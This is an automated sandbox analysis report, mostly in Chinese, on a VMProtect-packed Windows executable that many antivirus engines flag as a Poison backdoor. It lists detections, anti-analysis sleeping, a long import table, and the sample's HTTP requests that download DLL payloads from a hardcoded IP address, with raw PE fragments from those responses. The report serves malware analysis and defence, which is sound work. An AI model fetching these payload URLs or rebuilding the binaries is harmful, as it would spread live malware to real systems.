5.2
中危

db3bf7df2b9b1f4ce2ad0c7eac56bd45b8f6b7991befa66061a00659a276eba2

51eb783ad4f81ded5399d497c36bdc9e.exe

分析耗时

88s

最近分析

文件大小

12.4MB
静态报毒 动态报毒 100% @B0@AYJEMHNB AI SCORE=86 AIDETECTVM ATTRIBUTE BLACKMOON BSCOPE CONFIDENCE ELDORADO FIK6PQDFNKR7LNEYT6BJRW FLYSTUDIO GENERIC@ML GENERICKD GRAYWARE HACKTOOL HIGH CONFIDENCE HIGHCONFIDENCE ISVQ@5MBONP JJRA MALICIOUS PE MALWARE1 POISON PUPSTUDIO RDML SCORE SWLF TIGGRE UNSAFE WACATAC ZEXAF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee 20200901 6.0.6.653
Alibaba Backdoor:Win32/Poison.10a65709 20190527 0.3.0.5
CrowdStrike win/malicious_confidence_100% (D) 20190702 1.0
Baidu 20190318 1.0.0.2
Avast Win32:Malware-gen 20200901 18.4.3895.0
Tencent Win32.Backdoor.Poison.Swlf 20200901 1.0.0.1
Kingsoft 20200901 2013.8.14.323
行为判定
动态指标
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 个事件)
suspicious_features Connection to IP address suspicious_request GET http://110.42.9.115:8080/1/gzip.dll
suspicious_features Connection to IP address suspicious_request GET http://110.42.9.115:8080/1/socket.dll
suspicious_features Connection to IP address suspicious_request GET http://110.42.9.115:8080/1/dc.dll
suspicious_features Connection to IP address suspicious_request GET http://110.42.9.115:8080/1/ewe.dll
Performs some HTTP requests (5 个事件)
request GET http://www.win32test.com:8080/4/pro.txt
request GET http://110.42.9.115:8080/1/gzip.dll
request GET http://110.42.9.115:8080/1/socket.dll
request GET http://110.42.9.115:8080/1/dc.dll
request GET http://110.42.9.115:8080/1/ewe.dll
A process attempted to delay the analysis task. (1 个事件)
description 51eb783ad4f81ded5399d497c36bdc9e.exe tried to sleep 168 seconds, actually delayed analysis time by 168 seconds
Foreign language identified in PE resource (50 out of 59 个事件)
name TEXTINCLUDE language LANG_CHINESE offset 0x00cbb040 filetype C source, ASCII text, with CRLF line terminators sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000151
name TEXTINCLUDE language LANG_CHINESE offset 0x00cbb040 filetype C source, ASCII text, with CRLF line terminators sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000151
name TEXTINCLUDE language LANG_CHINESE offset 0x00cbb040 filetype C source, ASCII text, with CRLF line terminators sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000151
name WAVE language LANG_CHINESE offset 0x00cbb194 filetype RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 22050 Hz sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00001448
name RT_CURSOR language LANG_CHINESE offset 0x00cbcb60 filetype AmigaOS bitmap font sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00cbcb60 filetype AmigaOS bitmap font sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00cbcb60 filetype AmigaOS bitmap font sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00cbcb60 filetype AmigaOS bitmap font sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00cbcb60 filetype AmigaOS bitmap font sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00cbcb60 filetype AmigaOS bitmap font sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_BITMAP language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_BITMAP language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_BITMAP language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_BITMAP language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_BITMAP language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_BITMAP language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_BITMAP language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_BITMAP language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_BITMAP language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_BITMAP language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_BITMAP language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_BITMAP language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_BITMAP language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_BITMAP language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_BITMAP language LANG_CHINESE offset 0x00cbe454 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_MENU language LANG_CHINESE offset 0x00ce6e64 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000284
name RT_MENU language LANG_CHINESE offset 0x00ce6e64 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000284
name RT_DIALOG language LANG_CHINESE offset 0x00ce8104 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000018c
name RT_DIALOG language LANG_CHINESE offset 0x00ce8104 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000018c
name RT_DIALOG language LANG_CHINESE offset 0x00ce8104 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000018c
name RT_DIALOG language LANG_CHINESE offset 0x00ce8104 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000018c
name RT_DIALOG language LANG_CHINESE offset 0x00ce8104 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000018c
name RT_DIALOG language LANG_CHINESE offset 0x00ce8104 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000018c
name RT_DIALOG language LANG_CHINESE offset 0x00ce8104 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000018c
name RT_DIALOG language LANG_CHINESE offset 0x00ce8104 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000018c
name RT_DIALOG language LANG_CHINESE offset 0x00ce8104 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000018c
name RT_DIALOG language LANG_CHINESE offset 0x00ce8104 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000018c
name RT_DIALOG language LANG_CHINESE offset 0x00ce8104 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000018c
name RT_DIALOG language LANG_CHINESE offset 0x00ce8104 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000018c
name RT_STRING language LANG_CHINESE offset 0x00ce8b4c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000024
name RT_STRING language LANG_CHINESE offset 0x00ce8b4c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000024
name RT_STRING language LANG_CHINESE offset 0x00ce8b4c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000024
name RT_STRING language LANG_CHINESE offset 0x00ce8b4c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000024
name RT_STRING language LANG_CHINESE offset 0x00ce8b4c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000024
name RT_STRING language LANG_CHINESE offset 0x00ce8b4c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000024
name RT_STRING language LANG_CHINESE offset 0x00ce8b4c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000024
name RT_STRING language LANG_CHINESE offset 0x00ce8b4c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000024
name RT_STRING language LANG_CHINESE offset 0x00ce8b4c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000024
name RT_STRING language LANG_CHINESE offset 0x00ce8b4c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000024
name RT_STRING language LANG_CHINESE offset 0x00ce8b4c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000024
An executable file was downloaded by the process 51eb783ad4f81ded5399d497c36bdc9e.exe (4 个事件)
Time & API Arguments Status Return Repeated
1620947783.728125
recv
buffer: HTTP/1.0 200 OK Date: Thu, 13 May 2021 15:18:03 GMT Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 Last-Modified: Wed, 12 Jun 2019 04:08:53 GMT ETag: "7e00-58b18924bf867" Accept-Ranges: bytes Content-Length: 32256 Connection: close Content-Type: application/x-msdownload MZÿÿ¸@غ´ Í!¸LÍ!This program cannot be run in DOS mode. $‡“®ÃòkýÃòkýÃòkýý6ýÀòkýÃòjýÏòkýý7ýÂòkýý5ýÂòkýý4ýÞòkýý1ýÂòkýRichÃòkýPEL–Aà!  r |žh ÀD#@wÌ}( à°x@p 4.text·pr `.data` v@À.rsrcà x@@.relocÀ°|@B´–AKERNEL32.dll
received: 1284
socket: 648
success 1284 0
1620947789.713125
recv
buffer: HTTP/1.0 200 OK Date: Thu, 13 May 2021 15:18:09 GMT Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 Last-Modified: Sat, 04 Jan 2020 07:11:39 GMT ETag: "21a400-59b4b2333c0c0" Accept-Ranges: bytes Content-Length: 2204672 Connection: close Content-Type: application/x-msdownload MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $€uÊTĤĤĤWZ<Á¤߉:Û¤߉…¤߉¤Íl7դĥ!¤߉ ò¤߉?Ť߉>Ť߉9ŤRichĤPEL´¾÷]à!  ü¤ «"\é!@@É»Õd¶ ` ôp lPð@,@x.text”ûü `.rdataûސ@@.dataľ t@À.rsrcô`  @@.relocΙp š @Bé ÌÌÌÌÌÌÌÌÌÌÌU‹ì‹NW‹ø‹FF +Á;Ç}‹ø…ÿ~‹EWPQèšqƒÄ ~‹Ç_]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìSVW‹Ø‹Cj@{jPÿt‹M‹ð‰>3ÿWVR‰N‰~ÿˆ…Àu h@€èω~4‰~8‰~0ƒÃ _‰^<‹Æ^[]ÃÌÌÌÌÌÌÌÌÌU‹ì‹F…À„“‹MÁS‹3Ò÷ó…Òu‹ÓWjRQèr ^S3ÿÿ¬3À9Ft‰F‰FÿĉF ¿Sÿ¨…ÿt?‹}G ^0Pèá‹OŸÌjQ‹û辋}ƒÄVÇèÜ<…ÀuVSèÁW_[]ÂÌÌÌÌÌÌÌÌÌÌÌU‹ìƒìS‹]VEøPMüÃQÇEüèk“‹uü…Àt6W‹~ ÿÄ‹U‹[+Ç_;Br2…Ût ‹Eøƒ<ƒt h@€è¥Çƒ…öt*‹E ‰F‹Æ^[‹å]Â…Ût׋Eøƒ<ƒt h@€ès‰4ƒ‹M ‹EQèTþÿÿƒÄ‹ð^[‹å]ÂÌÌÌÌÌÌÌU‹ìQ‹G@S3ÛV‹w4;ÃtPèp3‰_@‰_<‰Ÿ€ƒÄ‰ŸÀ;óv'‰w<öö‰Ÿ€V‰ŸÀèª2VSP‰G@èKsƒÄ‹‰Eü9Ÿt5·Üè ‹‡Pè 3‹Eü‰Ÿ‰Ÿ‰Ÿ„ƒÄ‰ŸD;Ãv04…‰ŸDV‰Ÿ„‰‡è72VSP‰‡èÕrƒÄ‹‡ ‹w;Ãt!Pè§2‰Ÿ ‰Ÿ‰ŸLƒÄ‰ŸŒ;óv-‰·öö‰ŸLV‰ŸŒèØ1VSP‰‡ èvrƒÄ^[‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìjÿh¨íd¡PƒìVW¡ß3ÅPEôd£MðQU荃R3ÿP‰}ðèÐ3ö‰}ü‰uì9}ðvuI‹E苋‹°3Ò÷ñ;×u‹Ñ‹»…ÿtGBÿ;Ás@‹<‡¹;ÏÀ÷؃øu-…ÿt)‹w0‰Uäè5GPÿ€‹Mä‹WjRÿp‹uìF3ÿ‰uì;uðrŽ9»t2³Üè{ ‹ƒPèg1‰»‰»‰»„ƒÄ‰»D‹Qè(‹SjR»Ì臋ƒÐ3ɃÄ…À”Á‹Á…Àu h@€è׍s<è_‹C ‹=x…ÀtPÿ׋S,‹C(‹K$‹5|RPQÿ։C ‹C…ÀtPÿ׋S‹C‹KRPQÿ֋UèR‰Cèö0ƒÄ‹Môd‰ Y_^‹å]ÃU‹ìƒì‹E ‰Eü…ÀŽëSV‹w…öt‹N+NN …•‹w UøR^ÇEøè.…Àu-‹^‹CPjQÿtH3҉0‰P‰P‰X ‰H‰H‰Hë‹Eø3ҋH ‹p3Û;ÊŸÃK#ÙމX3Û;ÊŸÃK#Ëñ‰p‹O;Êt ‰A‹W‰Pë ‰P‰P‰Gÿ‰G‹ð‹Eü‹^^ ‹N+Ù;Ø|‹Ø…Û~‹
received: 2824
socket: 784
success 2824 0
1620947810.228125
recv
buffer: HTTP/1.0 200 OK Date: Thu, 13 May 2021 15:18:30 GMT Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 Last-Modified: Tue, 26 Nov 2019 05:18:20 GMT ETag: "1e000-598390228459c" Accept-Ranges: bytes Content-Length: 122880 Connection: close Content-Type: application/x-msdownload MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $þ%<–ºDRźDRźDRÅ@gKżDRÅÕ[YÅ»DRÅ9X\ŹDRÅÕ[XžDRÅÕ[VžDRŌbVŹDRźDSÅ DRÅR[XŶDRŌbYŵDRÅ}BTÅ»DRÅEdVÅ»DRÅRichºDRÅPELT×MSà! @ ã=PðÐze8pŒÀ¸Ð˜ PÜ.text<@ `.rdata5/P0P@@.datad1€ €@À.rsrc¸À @@.relocLÐ À@B
received: 2824
socket: 816
success 2824 0
1620947824.072125
recv
buffer: HTTP/1.0 200 OK Date: Thu, 13 May 2021 15:18:43 GMT Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 Last-Modified: Wed, 16 Nov 2016 03:40:44 GMT ETag: "2bbc00-54162d672c700" Accept-Ranges: bytes Content-Length: 2866176 Connection: close Content-Type: application/x-msdownload MZÿÿ¸@(º´ Í!¸LÍ!This program cannot be run in DOS mode. $lTY :ÒY :ÒY :ÒÎS;Ó[ :Ò6>Ò] :Ò"6ÒX :Ò60Ò] :ÒÚ4ÒR :ÒÇ­ýÒT :Òí‘ÎÒZ :Òí‘ÕÒp :ÒY ;ÒÜ:Òí‘ÈÒ\ :Ò~ËTÒ` :ÒÎS>Ó :ÒËS9Ó[ :ÒÎS?Ó8 :ÒÎS:ÓX :ÒËSÅÒX :ÒÎS8ÓX :ÒRichY :ÒPELÕ+Xà!  + ÐbPxŽàb€Ž Ž@ˆŽh€ƒŽ€€Ž€h›Ž4zŽhUPX0Ðb€àUPX1 +àbœ+@à.rsrc €Ž +@À3.03UPX!  %j1ª[ŽI˜+܁${ ÿoþÿ…öt·À‹ÈƒáºÓâÁèŠ0„Ðtÿ}@þ°Ã2ÀÃ̅Òt)_ÁéŠ nûÿ„Ét¶ÉÁá%ÿv€yH ÿ@Êöö{ׄy‹Á%2=w#tžÿ­}Èt (u!;È”ÀÁù<íiç`@  ïÁ×½–Gÿ.•ÌlûÿÿŠA¨`u$,öØÀƒàDò‹AbÛÿÏ?H€á€ùt‹@.@ ÏnÚ_>ŠÑ€âBú öÁ”LïÜ-ƒÀ.¶ æÞI{ß^Ð òÓn‰½› D$G_`öÿ»fVG‹IjPQè{‡LƒÄnì†÷„Ày/py¤H5]»×2üŸ‹cunØÞnúë Œ‹Âxü€d„§¾·]ñt…Àt;ˆ‹LŠQP€ÿ žˆ?¡{¤Tƒøÿu?hææÜ†ÀÇ`:<ï×ð zx u„œ_Ê´Å~,Ã3À!ŸXs¿ âü£ç¦྆=u €C vû=þÁxԍ@ud< tR zt\¹tKtD¼‹¹?~t1¶-“u&s{üãi t={=Y̺Û«<ÃUÚÏmp…¯t&|ßÑòüÀt#êëÃéfµ ,\۞–ß'Žù¸¡}Šƒ¯Ã"ü¶ÁF!£ ÿ‹ÂW‹9FU‹l*u·ƒ ¢`r,‰a€~ oÚ‹NÍ1R 8æøM¼‰Fë2aW;Ûívû‹ø‹’@ ÒRPW\f»ýWñ›,‰~ÆFŠ_>‹V @íÖ޾Ċ‹M‰´U‰P&MêHƒ8ÿÁë‚]8ì¨ª¶D3ĉ„$ðs¥½¤‹ ¬Œ$¼S3Û¯áÿW^¬V3ö;ˍT$(‰²JÄþ¾§=Ç   ‰´}‰”$##ïí§ˆœ‹ ­®¯ŸçywE\$ $÷þöÎlþW‰L´xë ›Pò‡ÝþwˋWü¯Õƒ|:‰Trœû»<À(Í+Êh$„ÊûŒýë ‹O'FÐ+"{ƒÁvÅDæ;Ãr{età GˀQD*ÅQÂP~÷ ƒ ë/;ó~Z‹”‹ƒ^ JÃîŽvˆPenMo’t;ÓâR)vRÁøCkCjö´ëÞ/2+ ¼j|‹´Ÿ¹:ƒlœæü ¬Ç TÌ3*Œw+~¦ú=‹ÿÿv‹þAÁ R‹T†Wðßb< ÐÑWR Å8Örœ‡Ÿ°_tT¨³ûî¾>­7,A^][3Ìpö‘û¸]ÄMcƒìŠLÀ üŽÀUVW3ÿ„É(‰ZÁ3Òh Š,â. ¿"Â3íƒÂÊ8:øU¼Û>:È($9²4"8~u濽­Ÿ0‹4êRt$+÷…ö~0 ïVu4$È\» p†™ë–$ R-¿s´ƒDêȰÙîæÿ@(ƚîtøßÝío!ƒÅÞ;lð|‘‹Ì×$;þ}7áW*Ï+÷LùÚWSg†c_ ^´2û°ö¶Ø6SWá3V¢ üM†"vŠÈ€á`t`6 'Åÿ€úS”è Þ¯ W‘bÛ¶0ÎEUÿ½E¬Ô5f$`<`u,ÄnMøÑ[^8éІ„ù$‹Æv»‹ÿR܋ðRV7 Ž\ôP²EÃ^25qRVq ö ,‹vü¿ø_ñÛT°S‹Ùƒû`Xuƒáü4H;ÆÛ¿éï>Xs;ëI\·iÒXä’÷éiÉäËs˜¨zrÊ;ǃ O»Lt$6Ç©áÛÃrî¢Î‹ÂÓàR[¶ÿ­ªˆÃz
received: 2824
socket: 820
success 2824 0
The binary likely contains encrypted or compressed data indicative of a packer (2 个事件)
entropy 7.855273766849956 section {'size_of_data': '0x0099c000', 'virtual_address': '0x0031d000', 'entropy': 7.855273766849956, 'name': '.vmp0', 'virtual_size': '0x0099b570'} description A section with a high entropy has been found
entropy 0.7728557964184731 description Overall entropy of this PE file is high
The executable is likely packed with VMProtect (1 个事件)
section .vmp0 description Section name indicates VMProtect
网络通信
Communicates with host for which no DNS query was performed (2 个事件)
host 110.42.9.115
host 172.217.24.14
File has been identified by 34 AntiVirus engines on VirusTotal as malicious (34 个事件)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
FireEye Generic.mg.51eb783ad4f81ded
Cylance Unsafe
Sangfor Malware
Alibaba Backdoor:Win32/Poison.10a65709
CrowdStrike win/malicious_confidence_100% (D)
Cyren W32/Agent.EW.gen!Eldorado
Symantec ML.Attribute.HighConfidence
APEX Malicious
Kaspersky Backdoor.Win32.Poison.jjra
BitDefender Trojan.GenericKD.34353953
MicroWorld-eScan Trojan.GenericKD.34353953
Avast Win32:Malware-gen
Tencent Win32.Backdoor.Poison.Swlf
Ad-Aware Trojan.GenericKD.34353953
Comodo TrojWare.Win32.Agent.ISVQ@5mbonp
Invincea heuristic
SentinelOne DFI - Malicious PE
eGambit HackTool.Generic
Antiy-AVL GrayWare/Win32.FlyStudio.a
Microsoft Trojan:Win32/Wacatac.DD!ml
ZoneAlarm Backdoor.Win32.Poison.jjra
GData Win32.Application.PUPStudio.A
BitDefenderTheta Gen:NN.ZexaF.34196.@B0@ayjEMhnb
ALYac Trojan.GenericKD.34353953
MAX malware (ai score=86)
VBA32 BScope.Trojan.Tiggre
ESET-NOD32 a variant of Win32/Packed.FlyStudio.AC potentially unwanted
Rising Trojan.Generic@ML.92 (RDML:fIk6pqdFNkr7LnEyt6BJrw)
Ikarus PUA.BlackMoon
AVG Win32:Malware-gen
Cybereason malicious.88042b
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-07-31 11:36:06

Imports

Library WINMM.dll:
0x60b794 PlaySoundA
0x60b798 waveOutRestart
0x60b7a4 midiStreamRestart
0x60b7a8 midiStreamClose
0x60b7ac waveOutWrite
0x60b7b0 midiOutReset
0x60b7b4 midiStreamStop
0x60b7b8 waveOutPause
0x60b7bc waveOutReset
0x60b7c0 midiStreamOut
0x60b7c8 midiStreamProperty
0x60b7cc midiStreamOpen
0x60b7d4 waveOutOpen
0x60b7d8 waveOutGetNumDevs
0x60b7dc waveOutClose
Library WS2_32.dll:
0x60b7f4 gethostname
0x60b7f8 inet_addr
0x60b7fc inet_ntoa
0x60b800 WSAStartup
0x60b804 WSACleanup
0x60b808 select
0x60b80c send
0x60b810 closesocket
0x60b814 WSAAsyncSelect
0x60b818 htons
0x60b81c bind
0x60b820 htonl
0x60b824 socket
0x60b828 sendto
0x60b82c recvfrom
0x60b830 ioctlsocket
0x60b834 connect
0x60b838 recv
0x60b83c listen
0x60b840 getpeername
0x60b844 __WSAFDIsSet
0x60b848 ntohs
0x60b84c getsockname
0x60b850 WSAGetLastError
0x60b854 ntohl
0x60b858 accept
0x60b85c gethostbyname
Library MSVFW32.dll:
0x60b44c DrawDibDraw
Library AVIFIL32.dll:
0x60b018 AVIStreamInfoA
0x60b01c AVIStreamGetFrame
Library RASAPI32.dll:
0x60b4a8 RasHangUpA
Library KERNEL32.dll:
0x60b1c8 LoadLibraryExA
0x60b1cc GetSystemDirectoryA
0x60b1d0 SetLastError
0x60b1d8 GetVersion
0x60b1dc Beep
0x60b1e4 IsBadReadPtr
0x60b1ec GetLocalTime
0x60b1f0 MapViewOfFile
0x60b1f4 CreateFileMappingA
0x60b1f8 LocalFree
0x60b1fc UnmapViewOfFile
0x60b200 FormatMessageA
0x60b204 CreateMutexA
0x60b208 SuspendThread
0x60b218 lstrcpynA
0x60b21c DuplicateHandle
0x60b220 FlushFileBuffers
0x60b224 LockFile
0x60b228 UnlockFile
0x60b22c SetEndOfFile
0x60b230 lstrcmpiA
0x60b234 GlobalDeleteAtom
0x60b238 GlobalFindAtomA
0x60b23c GlobalAddAtomA
0x60b240 GlobalGetAtomNameA
0x60b244 lstrcmpA
0x60b248 LocalAlloc
0x60b24c TlsAlloc
0x60b250 GlobalHandle
0x60b254 TlsFree
0x60b258 TlsSetValue
0x60b25c LocalReAlloc
0x60b260 TlsGetValue
0x60b264 GetFileTime
0x60b268 GetCurrentThread
0x60b26c GlobalFlags
0x60b270 SetErrorMode
0x60b274 GetProcessVersion
0x60b278 GetCPInfo
0x60b27c GetOEMCP
0x60b280 GetStartupInfoA
0x60b284 RtlUnwind
0x60b288 GetSystemTime
0x60b28c RaiseException
0x60b290 ExitThread
0x60b294 HeapSize
0x60b298 GetACP
0x60b29c SetStdHandle
0x60b2a0 GetFileType
0x60b2b8 SetHandleCount
0x60b2bc GetStdHandle
0x60b2c4 HeapDestroy
0x60b2c8 HeapCreate
0x60b2cc VirtualFree
0x60b2d4 LCMapStringA
0x60b2d8 LCMapStringW
0x60b2dc VirtualAlloc
0x60b2e0 IsBadWritePtr
0x60b2e8 GetStringTypeA
0x60b2ec GetStringTypeW
0x60b2f0 CompareStringA
0x60b2f4 CompareStringW
0x60b2f8 IsBadCodePtr
0x60b300 OpenProcess
0x60b304 TerminateProcess
0x60b308 GetCurrentProcess
0x60b30c GetFileSize
0x60b310 SetFilePointer
0x60b318 Process32First
0x60b31c Process32Next
0x60b320 TerminateThread
0x60b324 CreateSemaphoreA
0x60b328 ResumeThread
0x60b32c ReleaseSemaphore
0x60b338 GetProfileStringA
0x60b33c WriteFile
0x60b344 CreateFileA
0x60b348 DeviceIoControl
0x60b34c SetEvent
0x60b350 FindResourceA
0x60b354 LoadResource
0x60b358 LockResource
0x60b35c ReadFile
0x60b360 lstrlenW
0x60b364 RemoveDirectoryA
0x60b368 GetModuleFileNameA
0x60b36c WideCharToMultiByte
0x60b370 MultiByteToWideChar
0x60b374 GetCurrentThreadId
0x60b378 ExitProcess
0x60b37c GlobalSize
0x60b380 GlobalFree
0x60b38c lstrcatA
0x60b390 lstrlenA
0x60b394 WinExec
0x60b398 lstrcpyA
0x60b39c FindNextFileA
0x60b3a0 GlobalReAlloc
0x60b3a4 HeapFree
0x60b3a8 HeapReAlloc
0x60b3ac GetProcessHeap
0x60b3b0 HeapAlloc
0x60b3b4 GetUserDefaultLCID
0x60b3b8 GetFullPathNameA
0x60b3bc FreeLibrary
0x60b3c0 LoadLibraryA
0x60b3c4 GetLastError
0x60b3c8 GetVersionExA
0x60b3d8 CreateThread
0x60b3dc CreateEventA
0x60b3e0 Sleep
0x60b3e4 GlobalAlloc
0x60b3e8 GlobalLock
0x60b3ec GlobalUnlock
0x60b3f0 GetTempPathA
0x60b3f4 FindFirstFileA
0x60b3f8 FindClose
0x60b3fc GetFileAttributesA
0x60b400 DeleteFileA
0x60b404 CreateDirectoryA
0x60b410 GetModuleHandleA
0x60b414 GetProcAddress
0x60b418 MulDiv
0x60b41c GetCommandLineA
0x60b420 GetTickCount
0x60b424 CreateProcessA
0x60b428 WaitForSingleObject
0x60b42c CloseHandle
0x60b430 InterlockedExchange
0x60b434 ReleaseMutex
Library USER32.dll:
0x60b4c0 ScrollWindowEx
0x60b4c4 IsDialogMessageA
0x60b4c8 MoveWindow
0x60b4cc SetMenuItemBitmaps
0x60b4d4 LoadIconA
0x60b4d8 TranslateMessage
0x60b4dc DrawFrameControl
0x60b4e0 DrawEdge
0x60b4e4 DrawFocusRect
0x60b4e8 WindowFromPoint
0x60b4ec GetMessageA
0x60b4f0 DispatchMessageA
0x60b4f4 SetRectEmpty
0x60b504 DrawIconEx
0x60b508 CreatePopupMenu
0x60b50c AppendMenuA
0x60b510 ModifyMenuA
0x60b514 CreateMenu
0x60b51c GetDlgCtrlID
0x60b520 GetSubMenu
0x60b524 EnableMenuItem
0x60b528 ClientToScreen
0x60b530 LoadImageA
0x60b538 ShowWindow
0x60b53c IsWindowEnabled
0x60b544 GetKeyState
0x60b54c PostQuitMessage
0x60b550 IsZoomed
0x60b554 GetClassInfoA
0x60b558 DefWindowProcA
0x60b55c GetSystemMenu
0x60b560 DeleteMenu
0x60b564 GetMenu
0x60b568 SetMenu
0x60b56c PeekMessageA
0x60b570 IsIconic
0x60b574 SetFocus
0x60b578 GetActiveWindow
0x60b57c GetWindow
0x60b584 SetWindowRgn
0x60b58c CopyRect
0x60b590 LoadBitmapA
0x60b594 WinHelpA
0x60b598 KillTimer
0x60b59c SetTimer
0x60b5a0 ReleaseCapture
0x60b5a4 GetCapture
0x60b5a8 SetCapture
0x60b5ac GetScrollRange
0x60b5b0 SetScrollRange
0x60b5b4 SetScrollPos
0x60b5b8 SetRect
0x60b5bc InflateRect
0x60b5c0 DestroyIcon
0x60b5c4 PtInRect
0x60b5c8 OffsetRect
0x60b5cc IsWindowVisible
0x60b5d0 EnableWindow
0x60b5d4 RedrawWindow
0x60b5d8 GetWindowLongA
0x60b5dc SetWindowLongA
0x60b5e0 GetSysColor
0x60b5e4 SetActiveWindow
0x60b5e8 SetCursorPos
0x60b5ec LoadCursorA
0x60b5f0 SetCursor
0x60b5f4 GetDC
0x60b5f8 FillRect
0x60b5fc IsRectEmpty
0x60b600 ReleaseDC
0x60b604 IsChild
0x60b608 TrackPopupMenu
0x60b60c DestroyMenu
0x60b610 SetForegroundWindow
0x60b614 GetWindowRect
0x60b618 EqualRect
0x60b61c UpdateWindow
0x60b620 ValidateRect
0x60b624 InvalidateRect
0x60b628 GetClientRect
0x60b62c GetFocus
0x60b630 GetParent
0x60b634 GetTopWindow
0x60b638 PostMessageA
0x60b63c IsWindow
0x60b640 SetParent
0x60b644 DestroyCursor
0x60b648 SendMessageA
0x60b64c SetWindowPos
0x60b650 MessageBoxA
0x60b654 GetCursorPos
0x60b658 GetSystemMetrics
0x60b65c EmptyClipboard
